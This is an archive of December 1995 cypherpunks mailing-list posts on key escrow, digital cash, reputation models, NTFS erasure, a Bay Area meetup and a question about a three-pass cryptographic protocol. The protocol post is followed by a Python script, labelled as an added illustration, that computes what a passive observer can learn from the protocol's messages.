Telegraph provide a hint regarding the first question: 
 
   JOHN Major and Lord Taylor, the Lord Chief Justice, are to 
   have informal talks at No 10 Downing Street in an attempt 
   to avert a deepening rift between Government and judiciary. 
 
   The meeting has been arranged following concern over the
   number of adverse court judgments against ministerial
   decisions and mounting opposition by judges to plans by
   Michael Howard, the Home Secretary, to impose tougher
   mandatory sentences on habitual criminals.
 
   It was being emphasised in Whitehall last night that the
   informal meeting was intended to explore ways of improving
   relations. It was in no sense an attempt to put pressure on
   the judges.
 
   It emerged last night that Mr Major and Lord Taylor are
   likely to discuss ways of increasing the pay of the judiciary.
   Senior judges are said to be aggrieved that their salaries 
   have fallen behind. 
 
 
In no sense is one part of the State putting pressure on
another part of the State... 
 
Through every sense, the populace is trained to appreciate 
the justice of 
 
             not having a sense of freedom to stand up 
 
 
Except at the pay window. 
 
 
Cordially, 
 
Jim 
 
 
 
                              NOTE 
 
             The URL of The Electronic Telegraph's website is: 
 
             http://www.telegraph.co.uk 
 
             The newsstory's headlined: "Pay and peace talks 
             for judges."  Its online filename is: 1judge05.html. 
             It's dated 12 05 95. 
 
             The story was written by: GEORGE JONES and 
             TERENCE SHAW. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Tue, 5 Dec 95 08:51:33 PST
To: cypherpunks@toad.com
Subject: Secure versus ?
Message-ID: <9512051652.AA17214@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to everybody who replied to my previous message. As most of you
suspected, it turned out to be possible to break the permutations I was
using. The reason why I have pursued this despite its non-intuitiveness
is that the following well known protocol also seems to have the same
property I claimed. Please tell me how a computationally unbounded
adversary could defeat the following: (without active attack against
which this immediately fails (i.e. it has to be combined with an
authentication algorithm)).

Please help me, this problem is totally driving me crazy!

A VARIATION OF SHAMIR'S THREE PASS PROTOCOL SAFE FROM PASSIVE ATTACK
BY A COMPUTATIONALLY UNBOUNDED ADVERSARY:

Alice wants to send Bob a message. She is going to send her message a
fraction of a bit at a time via the following protocol.

Beforehand:

1. Enumerate all the primes from 256 to 511. Call them N.
2. For each prime, enumerate all the numbers less than it that are
   also relatively prime to N-1. Call these E.
3. Number each pair of E and N.

The algorithm can be divided into an inner loop and an outer loop. The
outer loop calls the inner loop.

Inner Loop:

Alice wants to use the inner loop to send bit b.
1. Alice randomly chooses seven bits of salt, and prepends b to them
   creating an 8 bit M
2. Alice randomly chooses an (Na,Ea) pair from the list of possibilities.
3. Alice calculates D such that E*D mod (N-1) equals 1
4. Bob randomly chooses an (Nb,Eb) pair from the list of possibilities.
5. Bob calculates D
6. Alice sends Bob the nine bit number (M^Ea) mod Na = C1
7. Bob sends Alice (C1^Eb) mod Nb = C2
8. Alice sends Bob (C2^Da) mod Na = C3
9. Bob calculates (C3^Db) mod Nb = M, the bit being the MSB.

The unbounded passive adversary calculates a probability (p) between 0.5
and one with which he/she can guess the bit. This is based on the facts
that

1. only a fraction of all pairs of Na and Ea will map C2 to C3,
2. only a fraction of all pairs of Nb and Eb will map C1 to C2,
3. only a fraction of all Na are high enough to produce C1.

With thousands of transform pairs, there are more bits of entropy in the
transform and salt selection, than there is information in the three messages.

Alice, Bob and Eve can thus know what p is.

Outer Loop:

1. Alice sends Bob an initialization vector using the inner loop.
2. Alice uses the inner loop to send Bob a series of bits.
   Each bit is either a random bit or the next bit of the message depending
   on what the value of p for the previous inner loop was.

	A simple proper (but VERY INEFFICIENT) outer loop algorithm
        would be the following:

Alice:
	1. If the p for the previous inner loop was 0.5, send the XOR
           of the message and the previously sent bit.
	2. If the p for the previous message was not 0.5, send a random bit.

Bob:
	1. If the p for the previous message was 0.5, take the bit, XOR
           with the previous bit, and append it to the message.
	2. Otherwise just save the bit for one more iteration.

PLEASE help me. I CAN'T find how this fails to be information-theoretically
secure, but I am convinced that it should not be possible to do this, and
I have been absolutely unproductive at anything since I first started
working on this.

Cheers,

Jason W. Solinsky
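
The inner loop above can be checked by exhaustive enumeration, which is what a computationally unbounded passive observer would do. The following Python is an added example, not part of the original post: it runs steps 6-9 as written and computes the exact posterior on the bit from (C1, C2, C3), assuming the bit, the salt and both (N,E) pairs are chosen uniformly and independently; all function names are mine. It also returns the value Bob computes in step 9 so it can be compared with M.

```python
"""Inner loop of the posted protocol and a passive observer's exact posterior.

Added illustration; names and the uniform-prior assumption are not from the post.
"""
import random
from math import gcd

# "Beforehand" steps 1-3: primes N in [256, 511] and every exponent E < N that
# is coprime to N-1, stored with its inverse D (E*D mod (N-1) == 1).
PRIMES = [n for n in range(256, 512) if all(n % p for p in range(2, 23))]
PAIRS = [(n, e, pow(e, -1, n - 1))
         for n in PRIMES for e in range(1, n) if gcd(e, n - 1) == 1]


def run_passes(m, alice, bob):
    """Steps 6-9 as written. Returns (C1, C2, C3, value Bob computes)."""
    na, ea, da = alice
    nb, eb, db = bob
    c1 = pow(m, ea, na)      # step 6: Alice -> Bob
    c2 = pow(c1, eb, nb)     # step 7: Bob -> Alice
    c3 = pow(c2, da, na)     # step 8: Alice -> Bob
    return c1, c2, c3, pow(c3, db, nb)   # step 9: Bob's result


def posterior_bit_is_one(c1, c2, c3):
    """P(b = 1 | C1, C2, C3) for an observer who can enumerate every pair.

    Assumed prior: bit, 7-bit salt and both pairs uniform and independent.
    Each Alice pair consistent with the transcript fixes exactly one M, so
    the posterior is a ratio of counts. The number of Bob pairs mapping C1
    to C2 multiplies both hypotheses equally and cancels.
    """
    counts = [0, 0]
    for n, e, d in PAIRS:
        if c1 >= n or c3 >= n:           # Alice's outputs are reduced mod Na
            continue
        if pow(c3, e, n) != c2 % n:      # C3 = C2^Da mod Na  <=>  C3^Ea = C2
            continue
        m = pow(c1, d, n)                # the M this pair would imply
        if m < 256:                      # M must be an 8-bit value
            counts[m >> 7] += 1          # MSB of M is the message bit
    total = counts[0] + counts[1]
    if total == 0:
        raise ValueError("transcript cannot be produced by the protocol")
    return counts[1] / total


def survey(trials=200, seed=1995):
    """Sample inner-loop runs; report how often each outcome occurs."""
    rng = random.Random(seed)
    undecided = certain = bob_ok = 0
    for _ in range(trials):
        bit = rng.randrange(2)
        m = (bit << 7) | rng.randrange(128)      # b prepended to 7 salt bits
        alice, bob = rng.choice(PAIRS), rng.choice(PAIRS)
        c1, c2, c3, got = run_passes(m, alice, bob)
        p1 = posterior_bit_is_one(c1, c2, c3)
        assert (p1 if bit else 1 - p1) > 0       # the truth is never excluded
        undecided += p1 == 0.5                   # the post's "p is 0.5" case
        certain += p1 in (0.0, 1.0)              # observer knows the bit
        bob_ok += got == m                       # does step 9 return M?
    return {"posterior_exactly_half": undecided / trials,
            "observer_certain": certain / trials,
            "bob_recovers_m": bob_ok / trials}


if __name__ == "__main__":
    print(len(PAIRS), "pairs over", len(PRIMES), "primes")
    for name, value in survey().items():
        print(f"{name}: {value:.3f}")
```

Running the file prints the size of the pair table and, over seeded random runs, how often the observer's posterior is exactly 0.5, how often it is 0 or 1, and how often Bob's step 9 returns M.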




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 5 Dec 95 12:00:36 PST
To: cypherpunks@toad.com
Subject: USENIX Conference.
Message-ID: <acea54cb07021004a26d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


USENIX is in San Diego this year so I will be attending. I hope to see some
of you there. If you will be going, please drop me a note. If there are
enough of us I will try to set up a BOF (birds of a feather) session for
cypherpunk / remailer discussions.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 5 Dec 95 04:18:22 PST
To: cypherpunks@toad.com
Subject: Some info on file/memory erasing on NT
Message-ID: <30C437D4.3EC0@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


The subject of protecting memory and files from other users in a multi-user
environment always seems to come up here every few weeks, so the following
short article culled from the MS Win32 SDK might be of interest.


- Andy

[...]
SUMMARY

File systems under Windows NT currently have virtual secure erasure (when a
file is deleted, the data is no longer accessible through the operating
system). Although the bits could still be on disk, Windows NT will not
allow access to them.

MORE INFORMATION

The NTFS file system does this by keeping a high-water mark, for each file,
of bytes written to the file. Everything below the line is real data,
anything above the line is (on disk) random garbage that used to be free
space, but any attempt to read past this high-water mark returns all zeros.

Other reusable objects are also protected. For example, all the memory
pages in a process's address space are zeroed when they are touched (unlike
the file system, a process may directly access its pages, and thus the
pages must be actually zeroed rather than virtually zeroed).

Note that file system security assumes physical security; in other words,
if a person has physical access to a machine and can boot an alternative
operating system and/or add custom device drivers and programs, he/she can
always get direct access to the bits on disk.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 5 Dec 95 09:25:26 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right on "My" Desktop ?
In-Reply-To: <Pine.BSD.3.91.951205025944.29416B-100000@ahcbsd1.ovnet.com>
Message-ID: <199512051726.MAA10193@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Friend, 

Enemy,

Please stop now. You are becoming a big time nuisance.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Dec 95 12:29:11 PST
To: sjb@universe.digex.net
Subject: Re: towards a theory of reputation
Message-ID: <199512052029.MAA08717@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Scott Brickner <sjb@universe.digex.net>
> 
> Hal writes:
> >Changing the market conventions (say, by introducing escrow agencies)
> >will change the weightings of the various factors that make up
> >utility.  If I no longer have to trust the honesty of the person I am
> >trading with (because we have an escrow agency to help us make the
> >exchange) then the importance of his reputation for honesty goes down.
> >The result is that the "reputation" curves will change rather
> >dynamically and unpredictably as we consider different possible
> >structures in the market.  This will make the analysis of them
> >intractable, I would think.
> 
> Analytically, using an escrow agent doesn't change the utility
> function.  It replaces the trading partner's honesty reputation
> estimate with the escrow agent's (which is presumably higher, or why
> use them?).  This is just a parameter substitution.
> 
> Whence comes the intractability?

By the "utility function" I was referring to Wei's model in which each
person has an idea of how much "utility" (a general summation of
personal value and usefulness) they would get from another person, as a
function of cost.  The utility function takes cost as input and returns
"utiles" (or whatever) as output.  So, with this model, using an escrow
agent would change the utility function; for a given cost, the utility
of a person to me would change (say, if the person involved were
thought to be dishonest, then the presence of escrow agents would make
him more useful to me).  The utility function in Wei's model is a curve
where the Y axis is utility and the X axis is cost.  Changing the
importance of honesty will change the position and shape of this
curve.

I think it would be more tractable to have a model in which honesty
played an explicit part.  We might even make assumptions about the
mathematical relationship between honesty and overall utility - for
example, that utility to me would be monotonically increasing with
increased honesty of the other guy.

What I mean is something like this.  Let t be the degree of trust
necessary for a business relationship to be consummated.  For t=0, no
trust is needed, and the relationship is such that neither party takes
any significant risk - a cash sale, perhaps.  For t=1, in some sense
total trust is needed, and a party can cheat the other with 100% safety.

Now let h(t) be the honesty reputation of a person, so that the utility
which people expect to receive from them gets multiplied by h(t).  For a
person with a reputation for honesty, h(t) is close to 1 for all t.  For a
person who seems dishonest, h(t) will go from 1 to 0 as t goes from 0 to
1.

This is all pretty hand-wavy, but the idea would be to come up with good
strategies to estimate h(t) from a person's behavior, and good ways to
choose what kind of behavior one should follow given the value(s) of t
which are prevalent in the market.  This kind of analysis would lead you
to focus on the importance of the amount of trust needed in a transaction.
The underlying utility function is based on such traditional factors as
productivity and reliability.  It won't change as we consider the
variables of our analysis, because we have factored out the honesty and
trust issues so that they are more explicit.  That's the kind of
direction I was suggesting.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 11:10:52 PST
To: cypherpunks@toad.com
Subject: No More Netscape Comments from Me
Message-ID: <ace9d98204021004b670@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Not that you all hang on my every word, but I owe it to you folks at least
a brief mention of why I feel I can no longer comment on Netscape. Not for
legal reasons, but for conflict-of-interest reasons.

I'm in the midst of making some investments involving Netscape
(buying/selling short, Internet Index options, etc.) and my comments from
herein out could be thought of by some as disingenuous.

So, have fun riding the Great Internet Bubble of 1995!

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Messick <eric@syzygy.com>
Date: Tue, 5 Dec 95 12:28:22 PST
To: cypherpunks@toad.com
Subject: ANNOUNCE: December 9th: Bay Area Cypherpunks Meeting and Party
Message-ID: <199512052032.MAA02154@syzygy.com>
MIME-Version: 1.0
Content-Type: text/plain


Bay Area Cypherpunks Meeting and Party

Saturday December 9th, 1995

What: Cypherpunks Meeting and Party
When: Saturday December 9th, 4pm - ???
Who:  You.
Where: Our dome in the Santa Cruz Mountains

We'll be providing some drinks and snacks.  Please feel free to bring
other consumables.

Directions follow.  Cut at the perforations and send to a PostScript
printer to generate a map.  Or, you can read the top of the file
directly.  This announcement is available on the Web at

<a href="http://syzygy.com/dec.cypherpunks.party.announcement.html">

this URL,</a> including a .gif version of the map and directions.

- ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - -
%!ps
%			Directions to KT & Eric's dome
%
%			KT & Eric
%			15139 Old Ranch Rd
%			Los Gatos CA 95030 8506
%			+1 408 353 4751
%
% From San Jose, take Highway 17 South from Highway 280 for 15 miles.
% From Santa Cruz, take Highway 17 North from Highway 1 for 12.5 miles.
% Exit Highway 17 at Summit Road (the only bridge over Highway 17 in
%    the mountains), and head west.
% 0.5 miles west of 17, turn left from Summit Road onto Hutchinson Road.
% 0.2 miles from Summit, just after Riva Ridge Road on the left and a long
%    group of mailboxes on the right, turn right from Hutchinson onto
%    Old Ranch Road.
% A short distance down Old Ranch there is a three-way fork.  The left
%    branch is a small driveway; the center branch is Old Ranch Road which
%    continues around a curve to the left (a sign points to the left to
%    indicate this); and the right branch leads to our house and three
%    others.  Our address (15139) is on the top of a sign to the right.
%    Turn onto the rightmost fork, down a steep grade.
% Our geodesic dome is 0.4 miles from Hutchinson Road down the rightmost
%    fork of Old Ranch Road.

/fg { 0 setgray } def
/bg { 1 setgray } def

/r { moveto currentpoint } def
/a { rmoveto pop pop currentpoint } def
/ah { pop pop currentpoint } def

/rc { rcurveto } def

/lab { % x y alpha (str)
	gsave
		4 2 roll rmoveto
		exch rotate
		show
	grestore
} def

/nl { show 7 sub r } def

bg clippath fill

4.25 72 mul 5.5 72 mul translate
90 rotate
2 2 scale
/Helvetica findfont 5 scalefont setfont

0 0 moveto
currentpoint

70 -100 a

	currentpoint				% North arrow
	50 30 a
	fg 3 setlinewidth
	0 60 rlineto ah stroke r
	0 -10 1 -15 5 -20 rc stroke r
	gsave
		-5 5 rmoveto
		/Times-Bold findfont 13 scalefont setfont
		(N) show
	grestore
	pop pop r

-12 20 -90 (to Santa Cruz -->) lab
-25 210 -65 (<-- to San Jose) lab

11 setlinewidth fg 2 120 -10 170 -30 200 rc stroke r	% 17 outer lines
7 setlinewidth bg 2 120 -10 170 -30 200 rc stroke r	% 17 interior
1 setlinewidth fg 2 120 -10 170 -30 200 rc stroke r	% 17 center

1.25 100 a

10 -40 270 (Highway 17) lab

2 setlinewidth

-2.5 27 rmoveto
fg 2 -7 5 -9 14.5 4.7 rc stroke r		% summit to 17n

-8.2 0 rmoveto
fg -2.5 20 -10.5 30 -20.5 50 rc stroke r	% summit to 17s

-12.75 35 rmoveto
fg 2 -15 -4 -8 -13.3 10 rc stroke r	% 17s to summit

1 setlinewidth

-3.2 49 rmoveto			% bridge fingers
fg 5 5 rlineto stroke r
-3.2 49 rmoveto
fg .85 -7 rlineto stroke r
-18.5 52 rmoveto
fg -3 6 rlineto stroke r
-19 52 rmoveto
fg -2 -6 rlineto stroke r

-1 48 rmoveto			% bridge border
9 setlinewidth
fg -8 3 -13 5 -20 4 rc stroke r
-1 48 rmoveto			% bridge interior
7 setlinewidth
bg -8 3 -13 5 -20 4 rc stroke r

2 setlinewidth

.5 0 rmoveto
fg 0 20 9.5 30 19.5 40 rc ah stroke r		% 17n to summit

	currentpoint
	fg 10 10 25 15 40 10 rc stroke r	% summit e
	33 15 -15 (Summit Rd) lab

	25 11.5 rmoveto
	fg 10 10 10 20 5 40 rc stroke r	% mt charlie e
	30 70 -80 (Mt Charlie Rd) lab

	5 15 25 (Phone) lab
	0 5 25 (Parking lot) lab
	pop pop r

fg -20 10 -40 15 -48 10 rc ah stroke r		% across bridge
fg -16 -10 10 -35 -3 -43 rc ah stroke r
fg 5 -10 0 -20 5 -30 rc stroke r		% mt charlie w
5 -5 -80 (Mt Charlie Rd) lab
fg -13 -8 -20 20 -30 15 rc ah stroke r
fg -10 -5 -30 -20 -55 -20 rc ah stroke r
fg 5 -10 0 -20 5 -30 rc stroke r		% stagecoach
5 -5 280 (Stagecoach Rd) lab
fg -25 0 -10 -20 -15 -25 rc ah stroke r
fg -5 -5 -30 0 -40 0 rc stroke r		% summit continues...
-45 5 -5 (Summit Rd) lab
fg 5 -5 0 -20 0 -30 rc ah stroke r		% hutchinson
5 25 -90 (Hutchinson Rd) lab
% side road could go here
fg 0 -10 3 -10 5 -17 rc ah stroke r
fg 5 -5 10 -8 20 -8 rc stroke r		% riva ridge
15 -5 0 (Riva Ridge Rd) lab
fg 1 -3 1 -4 2 -7 rc ah stroke r
fg 1 -3 5 -5 10 -7 rc stroke r		% hutchinson continues...
3 -12 -20 (Hutchinson Rd) lab
1.5 setlinewidth
fg -5 -5 -10 8 -15 3 rc ah stroke r	% old ranch
fg -3 -3 0 -10 5 -15 rc stroke r	% old ranch continues...
-8 -9 -55 (Old Ranch Rd) lab
1 setlinewidth
fg 2 1 rmoveto
-1 -2 1 -4 5 -7 rc stroke r		% left fork driveway
fg -5 5 -15 15 -20 12 rc ah stroke r	% our portion of old ranch
fg -5 -3 -15 -15 -25 -10 rc ah stroke r
fg -10 5 -15 5 -20 0 rc ah stroke r
fg -5 -5 -10 -5 -20 0 rc stroke r	% our portion continues...
fg 5 -5 rlineto ah stroke r		% our driveway

fg 7 2 rmoveto currentpoint newpath
3 0 360 arc stroke r

/Helvetica-Bold findfont 5 scalefont setfont
-15 -10 0 (KT & Eric) lab
-15 -15 0 (15139 Old Ranch Rd) lab
-15 -20 0 (Los Gatos CA 95030 8506) lab
-15 -25 0 (+1 408 353 4751) lab

-155 115 moveto ah
/Times-Roman findfont 6 scalefont setfont

(From San Jose, take Highway 17 South from Highway 280 for 15 miles.) nl
(From Santa Cruz, take Highway 17 North from Highway 1 for 12.5 miles.) nl
(Exit Highway 17 at Summit Road \(the only bridge over Highway 17 in) nl
(   the mountains\), and head west.) nl
(0.5 miles west of 17, turn left from Summit Road onto Hutchinson Road.) nl
(0.2 miles from Summit, just after Riva Ridge Road on the left and a long group) nl
(   of mailboxes on the right, turn right from Hutchinson onto Old Ranch Road.) nl
(A short distance down Old Ranch there is a three-way fork.  The left branch is a) nl
(   small driveway; the center branch is Old Ranch Road which continues around a) nl
(   curve to the left \(a sign points to the left to indicate this\); and the right branch) nl
(   leads to our house and three others.  Our address \(15139\) is on the top of a) nl
(   sign to the right.  Turn onto the rightmost fork, down a steep grade.) nl
(Our geodesic dome is 0.4 miles from Hutchinson Road down the rightmost) nl
(   fork of Old Ranch Road.) nl

-80 128 moveto ah
/Times-Bold findfont 12 scalefont setfont

(Directions to KT & Eric's dome) nl

pop pop
showpage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Turner <dave.turner@wmc.ac.uk>
Date: Tue, 5 Dec 95 04:58:42 PST
To: cypherpunks@toad.com
Subject: Joining The Mailing List
Message-ID: <"mailhub.live:260730:951205123724"@liverpool.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,
Would it be possible to include me on your current mailing list?

Thanks
  Dave.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 5 Dec 95 12:55:39 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: another fbi prosecution
In-Reply-To: <2.2b8.32.19951205200735.0067bb30@panix.com>
Message-ID: <Pine.ULT.3.91.951205125436.27077A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Dec 1995, Duncan Frissell wrote:

> At 07:30 AM 12/5/95 -0500, you wrote:
> 
> > sophomore Dominick LaScala was charged last week in federal court with two 
> > counts of computer fraud.
> 
> I thought fraud was obtaining something of value by false pretenses or
> uttering a false document or something.  Doesn't sound like fraud to me.

I think they're referring to at least one of the accounts being obtained
under false pretenses, and the From: lines (and probably Message-ID,
Received, etc) being forged. 

Which would still be an interesting precedent, yes.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 5 Dec 95 12:00:01 PST
To: cypherpunks@toad.com
Subject: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security"
Message-ID: <199512052001.NAA20742@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

<begin quote>
   
   daily news
   
   Uncle Sam Needed for Net Security
   
   picture
   
   By Anne Knowles
          November 29, 1995, 12 p.m. PT
          
          BOSTON--Getting the government involved in maintaining
Internet data privacy may not be popular, but it's going to be
necessary. That's the message Netscape Communications chair Jim
Clark delivered this morning in his keynote address to an audience
here at Email World and Internet Expo.
          
          To secure Net communications, the government will need to
have access to private data exchanges using what is known as a key
escrow security system, said Clark. He added that an invincible
security system for the Net is possible, but such a system
won't be built unless the government has a stake in it. "That's
where key escrow comes in," said Clark.
          
          Key escrow is a controversial security system advocated by
the Clinton administration that gives the government access to
private Net communications. It uses public key cryptography, a
system in which messages are coded and decoded using a set of
private and public keys. In key escrow, the private key is held
by both the individual or group and the government. The
government can use the key ostensibly to read messages for
intelligence and national security reasons.
          
          Currently the U.S. government restricts export of strong
keys in excess of 40 bits so it can break the code if necessary. The
weaker keys, however, make the messages vulnerable to other
attacks as well. A group of French scientists, for example,
cracked Netscape software using 40-bit keys by employing a
network of supercomputers over the course of a week. According
to Clark, though, restricting the export of stronger software
isn't the answer. "That's the wrong solution; we need
bulletproof keys."
          
          Netscape's stock price soared $20 yesterday based on a buy
recommendation by Goldman Sachs. The stock continues to climb
today: the share price is up $9 to $140. Clark said Netscape is
trying to keep pace with everyone's expectations. "The Internet
is a gargantuan opportunity, but it's up to us to take advantage of
it."
          
          Expect to see more fluctuations. Said Steve Weiss, a
principal at Product Management Group in San Francisco, "Anything like
this that is so closely allied to wishes, bets, and beliefs is likely
to move up and down quite a bit." The run up is a reflection of the
promise the Internet holds for investors.  After all, added Weiss,
"the stock market is the mirror of the soul of the Internet."

          [Additonal reporting by Denise Shelton.]

<end quote>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMSk8PWZSllhfG25AQESyQP8DBxGvO9Gkbwya6MmAVPRpGH2kqhQ3As5
5+2WoUKRpAfRg/0riHqIRK1vB9NW6mIM8Tl1I1FH1E7cagamKAb3yqjIQ56UApQG
9ow2ULaT7bRUHkhQuSF2jOpsJvzJdXSJGtvUyxB+BM0roAQHjFeWSVoUYv2GgVgU
7AsJwlLYorQ=
=/+dp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 5 Dec 95 12:56:20 PST
To: Eric Messick <eric@syzygy.com>
Subject: Re: ANNOUNCE: December 9th: Bay Area Cypherpunks Meeting and Party
Message-ID: <v02120d05acea6467134b@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 12/5/95, Eric Messick wrote:
>Bay Area Cypherpunks Meeting and Party
>
>Saturday December 9th, 1995
>
>What: Cypherpunks Meeting and Party
>When: Saturday December 9th, 4pm - ???
>Who:  You.
>Where: Our dome in the Santa Cruz Mountains
>
>We'll be providing some drinks and snacks.  Please feel free to bring
>other consumables.

Heh. I'm still sorry I'll be missing this. I'm sadly going to be up in
Chicago that weekend getting ready for an internet security conference.

Since I'm CC:ing this to the list, is anyone else going to be at 'Securing
Electronic Commerce on the Internet?' Thought it might be interesting to
dive out for dinner some evening with a few other Cpunk.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 5 Dec 95 10:39:56 PST
To: pfarrell@netcom.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <01HYG7SGZ8ZO9S3QKQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"pfarrell@netcom.com"  5-DEC-1995 02:49:01.83

Accountants know how to meet acceptable auditing standards when
transactions are in cash. I learned this from the CPA I live
with.
-----------------
	How does this work? While I can see tracking expenditures (i.e.,
the advertized price of an item and the amount of that item purchased by a
store), it would appear decidedly more difficult in the case of service
companies (and even more so for self-employed individuals). I am not referring
to a company being able to keep track of its own books; I am referring to the
IRS accepting those books as the real ones, when a large part of the company's
income is in cash and therefore hard to trace.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 5 Dec 95 10:43:10 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: [NOISE] [POINTER]
Message-ID: <Pine.SUN.3.91.951205133522.20012A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


(All my messages will now be tagged as noise, because someone, somewhere, 
might disagree :)  )

http://www.salon1999.com/current/features/media.html

About censorship and fear in the media.  No crypto mentions, but Exon, 
V-Chip, Internet, etc... for the average reader, really.  But interesting 
nonetheless...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 5 Dec 95 10:47:09 PST
To: nsb+limbo@nsb.fv.com
Subject: Re: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9Meeting on Electronic Payment)
Message-ID: <01HYG84E8ZRU9S3QKQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"nsb+limbo@nsb.fv.com"  "Nathaniel Borenstein"  5-DEC-1995 09:37:47.34

A true geodesic structure is self-supporting and self-structuring.  A
cryptographic infrastructure can and should be similar, I agree
completely.  However, a *monetary* infrastructure needs convertibility,
and the points of conversion are always the best targets of attack for
criminals.  (I've been casting about for an analogy to physical
geodesics, and it's hard to find one.  The best I can come up with is to
imagine that in order to convert a carbon buckyball to a more
conventional set of carbon molecules, you had to do it through a service
bureau that was capable of error, fraud, or subversion by outside
criminals.  This would ONLY matter if you ever wanted to do such
conversions, but it would matter a lot then, especially if you had to
suffer a serious financial loss if you got the wrong carbon molecules at
the end of the process.)

IF you wanted to settle for a totally non-convertible economy (like
rubles in the old Soviet Union, or like the LETS system on the net
today, as I understand it) then you could build it geodesically.  But if
you want to be able to convert back and forth between Internet payment
systems and non-Internet payment systems, it can never be truly
geodesic.  It will always be attackable at the points of conversion. 
(You may "trade digital certificates", but how do you know the ones
you're receiving were obtained for legitimate real-world value?) 
Because of this, the underwriting financial institutions, who have a
very reasonable desire to limit their own risk, will inevitably seek the
protection-by-traceability offered by something less than perfect
anonymity.  We may not like it, but it's a very natural position to be
taken by those who are actually bearing the financial risks at the point
----------------------------
	All of this is assuming that the digital currency being produced has
a one-to-one ratio with some "real" currency. If, for instance, the digital
certificates were indeed bought with a one-to-one ratio from the producer, but
were traded to others for "real" cash at some market-determined discount, the
market would incorporate the risk. The traders who were willing to take the
risk that the certificates were not actually worth one dollar/whatever would
be able to make a profit by the difference between one digital dollar and one
"real" dollar. The problem is simplified even more with privately backed
currencies.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Dec 95 12:06:12 PST
To: cypherpunks@toad.com
Subject: Re: another fbi prosecution
Message-ID: <2.2b8.32.19951205200735.0067bb30@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 AM 12/5/95 -0500, you wrote:

> sophomore Dominick LaScala was charged last week in federal court with two 
> counts of computer fraud.
